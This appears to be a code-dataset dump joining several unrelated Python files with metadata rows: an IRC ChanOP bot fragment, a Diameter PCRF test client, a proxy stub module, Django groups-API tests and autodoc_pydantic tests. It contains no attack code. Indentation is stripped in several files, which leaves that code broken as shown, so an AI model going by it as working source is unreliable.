self.send_msg_as("chanop", "NOTICE", username, "ERROR: SYNTAX for drop: /msg ChanOP drop <channel>\n" )
def process_chanop_help(self, prefix, command, params):
username = prefix[1:]
hpath = "./help/chanop/"
if len(params) == 2:
hfile = open(hpath + "help.txt", 'r')
lines = hfile.readlines()
for line in lines:
if len(line) > 0:
self.send_msg_as("chanop","NOTICE", username, line.strip())
if len(params) > 2:
helpfiles = {
"registration": "registration.txt",
"register": "register.txt",
"drop": "drop.txt",
"modes": "set_modes.txt",
"op": "op.txt",
"deop": "deop.txt",
"database": "database.txt",
"adduser": "adduser.txt",
"deluser": "deluser.txt",
"setuser": "setuser.txt",
"access": "access.txt"
}
topic = params[2].lower().strip()
valid_file = False
try:
hfilesz = hpath + helpfiles[topic]
valid_file = True
except:
valid_file = False
print("no help file")
if valid_file:
hfile = open(hfilesz, 'r')
lines = hfile.readlines()
for line in lines:
if len(line.strip()) != 0:
self.send_msg_as("chanop","NOTICE", username, line.strip())
else:
self.send_msg_as("chanop","NOTICE", username, f"ERROR: No valid help topic for {topic} found")
def process_chanop_commands(self, prefix, command, params):
chan = ''
if len(params) >= 2:
chan = params[0]
cmdp = params[1].strip()
if command == 'PRIVMSG' and chan[:1] == '#' and cmdp[:2] == ':`' and len(params) >= 2:
try:
lenp = len(cmdp)-2
cmd = cmdp[-lenp:]
self.dispatch[cmd].__call__(self, prefix, command, params)
except:
return
if command == 'PRIVMSG' and params[0] == '00000000A' and self.spawned_chanop == True:
try:
lenp = len(cmdp)-1
cmd = cmdp[-lenp:]
self.dispatchpriv[cmd].__call__(self, prefix, command, params)
except:
return
| 55.891691 | 201 | 0.346515 | 7,330 | 97,531 | 4.498772 | 0.042156 | 0.029355 | 0.030022 | 0.03548 | 0.842128 | 0.825358 | 0.806587 | 0.799521 | 0.785298 | 0.774503 | 0 | 0.017911 | 0.566661 | 97,531 | 1,745 | 202 | 55.891691 | 0.762327 | 0.000154 | 0 | 0.767341 | 0 | 0.005058 | 0.115324 | 0.0007 | 0 | 0 | 0 | 0 | 0 | 1 | 0.014451 | false | 0.002168 | 0.002168 | 0 | 0.019509 | 0.047688 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
f7750e009ef6c40a2a5f300c8229d0008734adb4 | 10,459 | py | Python | PCRF_sim/tests_CCR-I-U-T.py | fertiland/pyprotosim | b329c060f1cd521e264da8416249a02429f432f3 | [
"BSD-2-Clause"
] | 12 | 2017-11-07T12:45:43.000Z | 2022-02-10T12:36:49.000Z | PCRF_sim/tests_CCR-I-U-T.py | fertiland/pyprotosim | b329c060f1cd521e264da8416249a02429f432f3 | [
"BSD-2-Clause"
] | 1 | 2019-02-12T09:25:55.000Z | 2019-02-12T09:25:55.000Z | PCRF_sim/tests_CCR-I-U-T.py | fertiland/pyprotosim | b329c060f1cd521e264da8416249a02429f432f3 | [
"BSD-2-Clause"
] | 5 | 2018-09-19T09:46:50.000Z | 2020-08-20T09:46:53.000Z | #!/usr/bin/python
##################################################################
# Copyright (c) 2012, Sergej Srepfler <sergej.srepfler@gmail.com>
# Test client added by L.Belov <lavrbel@gmail.com>
# February 2012 - March 2014
# Version 0.1.1, Last change on Mar 11, 2014
# This software is distributed under the terms of BSD license.
##################################################################
# These are 5 CCR tests for using with and without LDAP database.
#Next two lines are to include parent directory for testing
import sys
import socket
sys.path.append("..")
from libDiameter import *
if __name__ == '__main__':
# SET THIS TO PCRF SIMULATOR IP/PORT
HOST='127.0.0.1'
PORT=3868
Conn=Connect(HOST,PORT)
LoadDictionary("../dictDiameter.xml")
# TEST 1 -- SEND CCR-I TO PCRF with MSISDN FOUND in SPR database
print "TEST 1 -- SEND CCR-I TO PCRF with IDENTITY(MSISDN) WHICH IS FOUND in SPR LDAP database"
CCR_avps=[ ]
CCR_avps.append(encodeAVP('Origin-Host', 'pgw.myrealm.example'))
CCR_avps.append(encodeAVP('Session-Id', 'pgw.myrealm.example;1094791309121_1385989500_428022'))
CCR_avps.append(encodeAVP('Called-Station-Id', 'test.apn'))
CCR_avps.append(encodeAVP('Origin-Realm', 'myrealm.example'))
CCR_avps.append(encodeAVP('Destination-Realm', 'myrealm.example'))
CCR_avps.append(encodeAVP('Destination-Host', 'pcrf.myrealm.example'))
CCR_avps.append(encodeAVP('Auth-Application-Id', 16777238))
CCR_avps.append(encodeAVP('CC-Request-Type', 1))
CCR_avps.append(encodeAVP('CC-Request-Number', 0))
CCR_avps.append(encodeAVP('Subscription-Id',[encodeAVP('Subscription-Id-Data', '1234567890'), encodeAVP('Subscription-Id-Type', 0)]))
CCR_avps.append(encodeAVP('Subscription-Id',[encodeAVP('Subscription-Id-Data', '123456789101112'), encodeAVP('Subscription-Id-Type', 1)]))
CCR_avps.append(encodeAVP('Framed-IP-Address', '192.168.0.1'))
# 3GPP Gx=16777238
# Create message header (empty)
CCR=HDRItem()
# Set command code
CCR.cmd=dictCOMMANDname2code('Credit-Control')
# Set Hop-by-Hop and End-to-End
initializeHops(CCR)
# Add AVPs to header and calculate remaining fields
msg1=createReq(CCR,CCR_avps)
# msg now contains CCR Request as hex string
# send data
Conn.send(msg1.decode('hex'))
# Receive response
received1 = Conn.recv(1024)
# Parse and display received ANSWER
print "="*30
print "THE ANSWER IS:"
msg=received1.encode('hex')
print "="*30
H=HDRItem()
stripHdr(H,msg)
avps=splitMsgAVPs(H.msg)
cmd=dictCOMMANDcode2name(H.flags,H.cmd)
if cmd==ERROR:
print 'Unknown command',H.cmd
else:
print cmd
print "Hop-by-Hop=",H.HopByHop,"End-to-End=",H.EndToEnd,"ApplicationId=",H.appId
print "="*30
for avp in avps:
# print "RAW AVP",avp
print "Decoded AVP",decodeAVP(avp)
print "-"*30
# END OF TEST 1
# TEST 2 -- SEND CCR-I TO PCRF with ANOTHER MSISDN FOUND in SPR database
print "TEST 2 -- SEND ANOTHER CCR-I TO PCRF with USER FOUND in SPR database"
CCR_avps=[ ]
CCR_avps.append(encodeAVP('Origin-Host', 'pgw.myrealm.example'))
CCR_avps.append(encodeAVP('Session-Id', 'pgw.myrealm.example;1093791309121_1385989500_4280888'))
CCR_avps.append(encodeAVP('Called-Station-Id', 'test.apn'))
CCR_avps.append(encodeAVP('Origin-Realm', 'myrealm.example'))
CCR_avps.append(encodeAVP('Destination-Realm', 'myrealm.example'))
CCR_avps.append(encodeAVP('Destination-Host', 'pcrf.myrealm.example'))
CCR_avps.append(encodeAVP('Auth-Application-Id', 16777238))
CCR_avps.append(encodeAVP('CC-Request-Type', 1))
CCR_avps.append(encodeAVP('CC-Request-Number', 0))
CCR_avps.append(encodeAVP('Framed-IP-Address', '192.168.0.2'))
CCR_avps.append(encodeAVP('Subscription-Id',[encodeAVP('Subscription-Id-Data', '1234567891'), encodeAVP('Subscription-Id-Type', 0)]))
CCR_avps.append(encodeAVP('Subscription-Id',[encodeAVP('Subscription-Id-Data', '123456789101113'), encodeAVP('Subscription-Id-Type', 1)]))
# 3GPP Gx=16777238
# Create message header (empty)
CCR=HDRItem()
# Set command code
CCR.cmd=dictCOMMANDname2code('Credit-Control')
# Set Hop-by-Hop and End-to-End
initializeHops(CCR)
# Add AVPs to header and calculate remaining fields
msg1=createReq(CCR,CCR_avps)
# msg now contains CCR Request as hex string
# send data
Conn.send(msg1.decode('hex'))
# Receive response
received1 = Conn.recv(1024)
# Parse and display received ANSWER
print "="*30
print "THE ANSWER IS:"
msg=received1.encode('hex')
print "="*30
H=HDRItem()
stripHdr(H,msg)
avps=splitMsgAVPs(H.msg)
cmd=dictCOMMANDcode2name(H.flags,H.cmd)
if cmd==ERROR:
print 'Unknown command',H.cmd
else:
print cmd
print "Hop-by-Hop=",H.HopByHop,"End-to-End=",H.EndToEnd,"ApplicationId=",H.appId
print "="*30
for avp in avps:
# print "RAW AVP",avp
print "Decoded AVP",decodeAVP(avp)
print "-"*30
# END OF TEST 2
# TEST 3 -- SEND CCR-U TO PCRF with USER FOUND in SPR database
print "TEST 3 -- SEND CCR-U TO PCRF with VALID USER FOUND in SPR database"
CCR_avps=[ ]
CCR_avps.append(encodeAVP('Origin-Host', 'pgw.myrealm.example'))
CCR_avps.append(encodeAVP('Session-Id', 'pgw.myrealm.example;1094791309121_1385989500_428022'))
CCR_avps.append(encodeAVP('Called-Station-Id', 'test.apn'))
CCR_avps.append(encodeAVP('Origin-Realm', 'myrealm.example'))
CCR_avps.append(encodeAVP('Destination-Realm', 'myrealm.example'))
CCR_avps.append(encodeAVP('Destination-Host', 'pcrf.myrealm.example'))
CCR_avps.append(encodeAVP('Auth-Application-Id', 16777238))
CCR_avps.append(encodeAVP('CC-Request-Type', 2))
CCR_avps.append(encodeAVP('CC-Request-Number', 0))
CCR_avps.append(encodeAVP('Framed-IP-Address', '192.168.0.1'))
CCR_avps.append(encodeAVP('Subscription-Id',[encodeAVP('Subscription-Id-Data', '1234567891'), encodeAVP('Subscription-Id-Type', 0)]))
CCR_avps.append(encodeAVP('Subscription-Id',[encodeAVP('Subscription-Id-Data', '123456789101114'), encodeAVP('Subscription-Id-Type', 1)]))
# 3GPP Gx=16777238
# Create message header (empty)
CCR=HDRItem()
# Set command code
CCR.cmd=dictCOMMANDname2code('Credit-Control')
# Set Hop-by-Hop and End-to-End
initializeHops(CCR)
# Add AVPs to header and calculate remaining fields
msg1=createReq(CCR,CCR_avps)
# msg now contains CCR Request as hex string
# send data
Conn.send(msg1.decode('hex'))
# Receive response
received1 = Conn.recv(1024)
# Parse and display received ANSWER
print "="*30
print "THE ANSWER IS:"
msg=received1.encode('hex')
print "="*30
H=HDRItem()
stripHdr(H,msg)
avps=splitMsgAVPs(H.msg)
cmd=dictCOMMANDcode2name(H.flags,H.cmd)
if cmd==ERROR:
print 'Unknown command',H.cmd
else:
print cmd
print "Hop-by-Hop=",H.HopByHop,"End-to-End=",H.EndToEnd,"ApplicationId=",H.appId
print "="*30
for avp in avps:
# print "RAW AVP",avp
print "Decoded AVP",decodeAVP(avp)
print "-"*30
# END OF TEST 3
# TEST 4 -- SEND CCR-I TO PCRF when USER IS NOT FOUND in SPR database
print "TEST 4 -- SEND CCR-I TO PCRF with USER NOT FOUND in SPR database"
print "Expect 5003 AVP"
CCR_avps=[ ]
CCR_avps.append(encodeAVP('Origin-Host', 'pgw.myrealm.example'))
CCR_avps.append(encodeAVP('Session-Id', 'pgw.myrealm.example;1093791309121_1385989500_426543'))
CCR_avps.append(encodeAVP('Called-Station-Id', 'test.apn'))
CCR_avps.append(encodeAVP('Origin-Realm', 'myrealm.example'))
CCR_avps.append(encodeAVP('Destination-Realm', 'myrealm.example'))
CCR_avps.append(encodeAVP('Destination-Host', 'pcrf.myrealm.example'))
CCR_avps.append(encodeAVP('Auth-Application-Id', 16777238))
CCR_avps.append(encodeAVP('CC-Request-Type', 1))
CCR_avps.append(encodeAVP('CC-Request-Number', 0))
CCR_avps.append(encodeAVP('Framed-IP-Address', '192.168.0.11'))
# We do not have this user in our SPR database:
CCR_avps.append(encodeAVP('Subscription-Id',[encodeAVP('Subscription-Id-Data', '1234567894'), encodeAVP('Subscription-Id-Type', 0)]))
CCR_avps.append(encodeAVP('Subscription-Id',[encodeAVP('Subscription-Id-Data', '123456789101115'), encodeAVP('Subscription-Id-Type', 1)]))
# 3GPP Gx=16777238
# Create message header (empty)
CCR=HDRItem()
# Set command code
CCR.cmd=dictCOMMANDname2code('Credit-Control')
# Set Hop-by-Hop and End-to-End
initializeHops(CCR)
# Add AVPs to header and calculate remaining fields
msg1=createReq(CCR,CCR_avps)
# msg now contains CCR Request as hex string
# send data
Conn.send(msg1.decode('hex'))
# Receive response
received1 = Conn.recv(1024)
# Parse and display received ANSWER
print "="*30
print "THE ANSWER IS:"
msg=received1.encode('hex')
print "="*30
H=HDRItem()
stripHdr(H,msg)
avps=splitMsgAVPs(H.msg)
cmd=dictCOMMANDcode2name(H.flags,H.cmd)
if cmd==ERROR:
print 'Unknown command',H.cmd
else:
print cmd
print "Hop-by-Hop=",H.HopByHop,"End-to-End=",H.EndToEnd,"ApplicationId=",H.appId
print "="*30
for avp in avps:
# print "RAW AVP",avp
print "Decoded AVP",decodeAVP(avp)
print "-"*30
# END OF TEST 4
# TEST 5 - SEND CCR-T REQUEST FROM CLIENT
print "==========SEND CCR-T request originated from user========="
print "TEST 5 -- SEND CCR-T TO PCRF session termination"
CCR_avps=[ ]
CCR_avps.append(encodeAVP('Origin-Host', 'pgw.myrealm.example'))
CCR_avps.append(encodeAVP('Session-Id', 'pgw.myrealm.example;1094791309121_1385989500_428022'))
CCR_avps.append(encodeAVP('Called-Station-Id', 'test.apn'))
CCR_avps.append(encodeAVP('Origin-Realm', 'myrealm.example'))
CCR_avps.append(encodeAVP('Destination-Realm', 'myrealm.example'))
CCR_avps.append(encodeAVP('Destination-Host', 'pcrf.myrealm.example'))
CCR_avps.append(encodeAVP('Auth-Application-Id', 16777238))
CCR_avps.append(encodeAVP('CC-Request-Type', 3))
CCR_avps.append(encodeAVP('CC-Request-Number', 0))
CCR_avps.append(encodeAVP('Framed-IP-Address', '192.168.0.1'))
CCR_avps.append(encodeAVP('Subscription-Id',[encodeAVP('Subscription-Id-Data', '1234567891'), encodeAVP('Subscription-Id-Type', 0)]))
CCR_avps.append(encodeAVP('Subscription-Id',[encodeAVP('Subscription-Id-Data', '123456789101114'), encodeAVP('Subscription-Id-Type', 1)]))
CCR=HDRItem()
CCR.cmd=dictCOMMANDname2code('Credit-Control')
initializeHops(CCR)
msg3=createReq(CCR,CCR_avps)
Conn.send(msg3.decode('hex'))
# Receive response
received3 = Conn.recv(1024)
# Parse and display received ANSWER
print "="*30
print "THE ANSWER IS:"
msg=received3.encode('hex')
print "="*30
H=HDRItem()
stripHdr(H,msg)
avps=splitMsgAVPs(H.msg)
cmd=dictCOMMANDcode2name(H.flags,H.cmd)
if cmd==ERROR:
print 'Unknown command',H.cmd
else:
print cmd
print "Hop-by-Hop=",H.HopByHop,"End-to-End=",H.EndToEnd,"ApplicationId=",H.appId
print "="*30
for avp in avps:
# print "RAW AVP",avp
print "Decoded AVP",decodeAVP(avp)
print "-"*30
| 34.179739 | 138 | 0.734965 | 1,534 | 10,459 | 4.953716 | 0.133638 | 0.064482 | 0.102645 | 0.173707 | 0.887748 | 0.878931 | 0.863403 | 0.850243 | 0.833926 | 0.833926 | 0 | 0.057849 | 0.094273 | 10,459 | 305 | 139 | 34.291803 | 0.744326 | 0.189311 | 0 | 0.841837 | 0 | 0.005102 | 0.370594 | 0.030903 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.015306 | null | null | 0.265306 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
e3d1f2d0f743b078f488320eb18045a08b815e6e | 202 | py | Python | code/default/gae_proxy/local/ipv6_tunnel/unknown.py | wuyongwen/XX-Net | 313aefd862b8f230f7c61dc29db1b2b93a17e6ab | [
"BSD-2-Clause"
] | null | null | null | code/default/gae_proxy/local/ipv6_tunnel/unknown.py | wuyongwen/XX-Net | 313aefd862b8f230f7c61dc29db1b2b93a17e6ab | [
"BSD-2-Clause"
] | null | null | null | code/default/gae_proxy/local/ipv6_tunnel/unknown.py | wuyongwen/XX-Net | 313aefd862b8f230f7c61dc29db1b2b93a17e6ab | [
"BSD-2-Clause"
] | null | null | null | #!/usr/bin/env python2
# coding:utf-8
import os
import sys
from .common import *
def state():
return "Developing"
def enable():
return "Developing"
def disable():
return "Developing"
| 10.631579 | 23 | 0.663366 | 26 | 202 | 5.153846 | 0.692308 | 0.358209 | 0.283582 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.012579 | 0.212871 | 202 | 18 | 24 | 11.222222 | 0.830189 | 0.168317 | 0 | 0.333333 | 0 | 0 | 0.180723 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | true | 0 | 0.333333 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 1 | 0 | 0 | 0 | 7 |
540a4946ca86b0951510a1ab8f78cc845701ed7e | 13,486 | py | Python | api/tests/tests_groups_route.py | djeni98/central-erros-back | 5d81e47df99685b4a470df56e62ff2c537fc3a52 | [
"MIT"
] | null | null | null | api/tests/tests_groups_route.py | djeni98/central-erros-back | 5d81e47df99685b4a470df56e62ff2c537fc3a52 | [
"MIT"
] | 1 | 2021-04-08T21:16:15.000Z | 2021-04-08T21:16:15.000Z | api/tests/tests_groups_route.py | djeni98/central-erros-back | 5d81e47df99685b4a470df56e62ff2c537fc3a52 | [
"MIT"
] | 1 | 2020-07-14T12:52:07.000Z | 2020-07-14T12:52:07.000Z | from api.tests.TestCase import TestCase, PermissionUtilities
from rest_framework import status
from rest_framework.test import APIClient
from logs.models import Group, Permission
class GroupRouteCase(TestCase, PermissionUtilities):
invalid_group = {
'name': 'group' + 'g' * 150
}
simple_valid_group = {
'name': 'simple group'
}
full_valid_group = {
'name': 'view all resources',
# permissions declared in setUp
}
route = '/api/groups/'
def setUp(self):
self.client = APIClient()
self.create_users_with_permissions(Group)
self.groups_list = []
for i in range(10):
group = Group.objects.create(name=f'group{i+1}')
self.groups_list.append(group)
self.full_valid_group['permissions'] = [
p.id for p in Permission.objects.filter(codename__contains='view')
]
def test_list_group(self):
response = self.client.get(f'{self.route}')
with self.subTest('Must return Unauthorized', response=response):
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
body = response.json()
self.assertIn('detail', body)
self.assertIn('authentication', body.get('detail').lower())
self.login(permission='delete')
response = self.client.get(f'{self.route}')
with self.subTest('Must return Forbidden', response=response):
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
body = response.json()
self.assertIn('detail', body)
self.assertIn('permission', body.get('detail').lower())
self.login(permission='view')
response = self.client.get(f'{self.route}')
with self.subTest('Must return data and a success code', response=response):
groups = response.json()
for i, group in enumerate(groups):
expected_group = self.groups_list[i]
self.assertEqual(expected_group.name, group.get('name'))
expected_group_permissions = [p.id for p in expected_group.permissions.all()]
self.assertEqual(expected_group_permissions, group.get('permissions'))
def test_create_group(self):
response = self.client.post(f'{self.route}', data={}, format='json')
with self.subTest('Must return Unauthorized', response=response):
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
body = response.json()
self.assertIn('detail', body)
self.assertIn('authentication', body.get('detail').lower())
self.login(permission='delete')
response = self.client.post(f'{self.route}', data={}, format='json')
with self.subTest('Must return Forbidden', response=response):
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
body = response.json()
self.assertIn('detail', body)
self.assertIn('permission', body.get('detail').lower())
self.login(permission='add')
response = self.client.post(f'{self.route}', data={}, format='json')
with self.subTest('Name must be required', response=response):
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
body = response.json()
self.assertIn('name', body)
self.assertSubstringIn('required', body.get('name'))
response = self.client.post(f'{self.route}', data=self.invalid_group, format='json')
with self.subTest('Name must be valid', response=response):
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
body = response.json()
self.assertIn('name', body)
self.assertSubstringIn('Ensure', body.get('name'))
data = self.simple_valid_group
response = self.client.post(f'{self.route}', data=data, format='json')
with self.subTest('Group must created with only required fields', response=response):
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
group = response.json()
self.assertEqual(data.get('name'), group.get('name'))
expected_groups = len(self.groups_list) + 1
db_groups = Group.objects.count()
self.assertEqual(expected_groups, db_groups)
data = self.full_valid_group
response = self.client.post(f'{self.route}', data=data, format='json')
with self.subTest('Group must be created with all fields', response=response):
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
group = response.json()
self.assertEqual(data.get('name'), group.get('name'))
expected_groups = len(self.groups_list) + 2
db_groups = Group.objects.count()
self.assertEqual(expected_groups, db_groups)
def test_list_one_group(self):
pk = len(self.groups_list) + 2
response = self.client.get(f'{self.route}{pk}/')
with self.subTest('Must return Unauthorized', response=response):
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
body = response.json()
self.assertIn('detail', body)
self.assertIn('authentication', body.get('detail').lower())
self.login(permission='delete')
response = self.client.get(f'{self.route}{pk}/')
with self.subTest('Must return Forbidden', response=response):
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
body = response.json()
self.assertIn('detail', body)
self.assertIn('permission', body.get('detail').lower())
self.login(permission='view')
response = self.client.get(f'{self.route}{pk}/')
with self.subTest('List must return not found', response=response):
self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND)
self.assertIn('detail', response.json())
self.assertIn('not found', response.json().get('detail').lower())
pk = 2
response = self.client.get(f'{self.route}{pk}/')
with self.subTest('Must return the correct group', response=response):
self.assertEqual(response.status_code, status.HTTP_200_OK)
group = response.json()
expected_group = self.groups_list[pk-1]
self.assertEqual(pk, group.get('id'))
self.assertEqual(expected_group.id, group.get('id'))
self.assertEqual(expected_group.name, group.get('name'))
def test_update_group(self):
pk = len(self.groups_list) + 2
response = self.client.put(f'{self.route}{pk}/', data={}, format='json')
with self.subTest('Must return Unauthorized', response=response):
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
body = response.json()
self.assertIn('detail', body)
self.assertIn('authentication', body.get('detail').lower())
self.login(permission='delete')
response = self.client.put(f'{self.route}{pk}/', data={}, format='json')
with self.subTest('Must return Forbidden', response=response):
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
body = response.json()
self.assertIn('detail', body)
self.assertIn('permission', body.get('detail').lower())
self.login(permission='change')
response = self.client.put(f'{self.route}{pk}/', data={}, format='json')
with self.subTest('Update must return not found', response=response):
self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND)
self.assertIn('detail', response.json())
self.assertIn('not found', response.json().get('detail').lower())
pk = 2
response = self.client.put(f'{self.route}{pk}/', data={}, format='json')
with self.subTest('Name must be required', response=response):
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
body = response.json()
self.assertIn('name', body)
self.assertSubstringIn('required', body.get('name'))
data = self.invalid_group
response = self.client.put(f'{self.route}{pk}/', data=data, format='json')
with self.subTest('Name must be valid', response=response):
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
body = response.json()
self.assertIn('name', body)
self.assertSubstringIn('Ensure', body.get('name'))
data = self.full_valid_group
response = self.client.put(f'{self.route}{pk}/', data=data, format='json')
with self.subTest('Group must be updated', response=response):
self.assertEqual(response.status_code, status.HTTP_200_OK)
group = response.json()
expected_group = self.groups_list[pk-1]
self.assertEqual(pk, group.get('id'))
self.assertEqual(expected_group.id, group.get('id'))
self.assertEqual(data.get('name'), group.get('name'))
self.assertEqual(data.get('permissions'), group.get('permissions'))
self.assertNotEqual(expected_group.name, group.get('name'))
def test_partial_update_group(self):
pk = len(self.groups_list) + 2
response = self.client.patch(f'{self.route}{pk}/', data={}, format='json')
with self.subTest('Must return Unauthorized', response=response):
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
body = response.json()
self.assertIn('detail', body)
self.assertIn('authentication', body.get('detail').lower())
self.login(permission='delete')
response = self.client.patch(f'{self.route}{pk}/', data={}, format='json')
with self.subTest('Must return Forbidden', response=response):
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
body = response.json()
self.assertIn('detail', body)
self.assertIn('permission', body.get('detail').lower())
self.login(permission='change')
response = self.client.patch(f'{self.route}{pk}/', data={}, format='json')
with self.subTest('Partial update must return not found', response=response):
self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND)
self.assertIn('detail', response.json())
self.assertIn('not found', response.json().get('detail').lower())
pk = 2
data = {'name': self.invalid_group.get('name')}
response = self.client.patch(f'{self.route}{pk}/', data=data, format='json')
with self.subTest('Field must be valid', response=response):
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
body = response.json()
self.assertIn('name', body)
self.assertSubstringIn('Ensure', body.get('name'))
data = {'name': self.full_valid_group.get('name')}
response = self.client.patch(f'{self.route}{pk}/', data=data, format='json')
with self.subTest('Group must be partial updated', response=response):
self.assertEqual(response.status_code, status.HTTP_200_OK)
group = response.json()
expected_group = self.groups_list[pk-1]
self.assertEqual(pk, group.get('id'))
self.assertEqual(expected_group.id, group.get('id'))
self.assertEqual(data.get('name'), group.get('name'))
self.assertNotEqual(expected_group.name, group.get('name'))
def test_delete_group(self):
pk = len(self.groups_list) + 2
response = self.client.delete(f'{self.route}{pk}/')
with self.subTest('Must return Unauthorized', response=response):
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
body = response.json()
self.assertIn('detail', body)
self.assertIn('authentication', body.get('detail').lower())
self.login(permission='add')
response = self.client.delete(f'{self.route}{pk}/')
with self.subTest('Must return Forbidden', response=response):
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
body = response.json()
self.assertIn('detail', body)
self.assertIn('permission', body.get('detail').lower())
self.login(permission='delete')
response = self.client.delete(f'{self.route}{pk}/')
with self.subTest('Delete must return not found', response=response):
self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND)
self.assertIn('detail', response.json())
self.assertIn('not found', response.json().get('detail').lower())
pk = 2
response = self.client.delete(f'{self.route}{pk}/')
with self.subTest('Group must be deleted', response=response):
self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)
total_groups = len(self.groups_list) - 1
db_groups = Group.objects.count()
self.assertEqual(total_groups, db_groups)
self.assertRaises(Group.DoesNotExist, Group.objects.get, pk=pk)
| 47.153846 | 93 | 0.629987 | 1,571 | 13,486 | 5.299173 | 0.077021 | 0.079279 | 0.060541 | 0.100541 | 0.874715 | 0.867267 | 0.865946 | 0.85994 | 0.843483 | 0.836396 | 0 | 0.009748 | 0.231722 | 13,486 | 285 | 94 | 47.319298 | 0.793746 | 0.00215 | 0 | 0.746835 | 0 | 0 | 0.14136 | 0 | 0 | 0 | 0 | 0 | 0.375527 | 1 | 0.029536 | false | 0 | 0.016878 | 0 | 0.067511 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
540fc7a262d1c959ffd77976ef1394696d234663 | 21,679 | py | Python | tests/test_configuration_fields.py | mansenfranzen/sphinx.ext.autodoc_pydantic | 5e97e03ebb8bdb09da67140c7a7d13ad42fb2fa9 | [
"MIT"
] | 46 | 2021-04-03T20:54:14.000Z | 2022-03-21T22:56:27.000Z | tests/test_configuration_fields.py | mansenfranzen/sphinx.ext.autodoc_pydantic | 5e97e03ebb8bdb09da67140c7a7d13ad42fb2fa9 | [
"MIT"
] | 74 | 2021-04-05T22:18:02.000Z | 2022-03-31T22:59:13.000Z | tests/test_configuration_fields.py | mansenfranzen/sphinx.ext.autodoc_pydantic | 5e97e03ebb8bdb09da67140c7a7d13ad42fb2fa9 | [
"MIT"
] | 6 | 2021-05-04T12:03:06.000Z | 2022-03-30T13:25:51.000Z | """This module contains tests for pydantic validator configurations.
"""
import pydantic
import pytest
from sphinx.addnodes import (
desc,
desc_signature,
desc_name,
desc_content,
desc_annotation,
desc_addname,
index
)
from sphinx.testing.util import assert_node
from sphinxcontrib.autodoc_pydantic import PydanticFieldDocumenter
from .compatibility import desc_annotation_default_value, \
desc_annotation_directive_prefix
KWARGS = dict(documenter=PydanticFieldDocumenter.directivetype,
deactivate_all=True)
def test_autodoc_pydantic_field_list_validators_true(autodocument):
kwargs = dict(object_path='target.configuration.FieldListValidators.field',
**KWARGS)
result = [
'',
'.. py:pydantic_field:: FieldListValidators.field',
' :module: target.configuration',
' :type: int',
'',
' Field.',
'',
' :Validated by:',
' - :py:obj:`check <target.configuration.FieldListValidators.check>`',
''
]
# explict global
actual = autodocument(
options_app={"autodoc_pydantic_field_list_validators": True},
**kwargs)
assert result == actual
# explicit local
actual = autodocument(
options_doc={"field-list-validators": True},
**kwargs)
assert result == actual
# explicit local overwrite global
actual = autodocument(
options_app={"autodoc_pydantic_field_list_validators": False},
options_doc={"field-list-validators": True},
**kwargs)
assert result == actual
def test_autodoc_pydantic_field_list_validators_false(autodocument):
kwargs = dict(object_path='target.configuration.FieldListValidators.field',
**KWARGS)
result = [
'',
'.. py:pydantic_field:: FieldListValidators.field',
' :module: target.configuration',
' :type: int',
'',
' Field.',
''
]
# explict global
actual = autodocument(
options_app={"autodoc_pydantic_field_list_validators": False},
**kwargs)
assert result == actual
# explicit local
actual = autodocument(
options_doc={"field-list-validators": False},
**kwargs)
assert result == actual
# explicit local overwrite global
actual = autodocument(
options_app={"autodoc_pydantic_field_list_validators": True},
options_doc={"field-list-validators": False},
**kwargs)
assert result == actual
def test_autodoc_pydantic_field_doc_policy_docstring(autodocument):
kwargs = dict(object_path='target.configuration.FieldDocPolicy.field',
**KWARGS)
result = [
'',
'.. py:pydantic_field:: FieldDocPolicy.field',
' :module: target.configuration',
' :type: int',
'',
' Field.',
''
]
